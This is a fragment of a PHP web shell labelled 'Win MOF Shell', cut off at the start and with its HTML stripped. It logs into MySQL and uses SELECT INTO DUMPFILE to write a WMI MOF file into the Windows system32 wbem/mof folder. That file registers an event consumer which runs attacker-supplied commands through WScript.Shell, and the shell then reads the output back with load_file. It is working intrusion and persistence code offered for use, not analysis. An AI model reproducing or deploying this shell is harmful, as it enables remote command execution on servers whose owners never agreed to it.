location.href='?action=connect'";}if(empty($_GET["action"])){?> Win MOF Shell Host: User: Pass: DB: '.mysql_error().''); echo " ";echo "Cmd:";echo " ";echo " ";echo " ";echo " ";echo "";echo " ";echo " ";echo " ";echo "";if (isset($_POST['cmd'])){$strCmd=$_POST['cmd'];$cmdshell='cmd /c '.$strCmd.'>'.$path;$mofname="c:/windows/system32/wbem/mof/system.mof";$payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\") instance of __EventFilter as \$EventFilter{ EventNamespace = \"Root\\\\\\\\Cimv2\"; Name = \"filtP2\"; Query = \"Select * From __InstanceModificationEvent \" \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \" \"And TargetInstance.Second = 5\"; QueryLanguage = \"WQL\";}; instance of ActiveScriptEventConsumer as \$Consumer{ Name = \"consPCSV2\"; ScriptingEngine = \"JScript\"; ScriptText = \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\"; }; instance of __FilterToConsumerBinding{ Consumer = \$Consumer; Filter = \$EventFilter;};";mysql_select_db($_COOKIE["connect"]["dbname"],$conn);$sql1="select '$payload' into dumpfile '$mofname';";if(mysql_query($sql1)) echo "
Execute Successful! Please click the read button to check the result!! If the result is not correct,try read again later
"; else die(mysql_error()); mysql_close($conn);} if(isset($_POST['flag'])){ $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die(' '.mysql_error().'
'); $sql2="select load_file(\"".$path."\");"; $result2=mysql_query($sql2); $num=mysql_num_rows($result2); while ($row = mysql_fetch_array($result2, MYSQL_NUM)) { echo "
"; echo ' '. $row[0].'
'; } mysql_close($conn);}}?>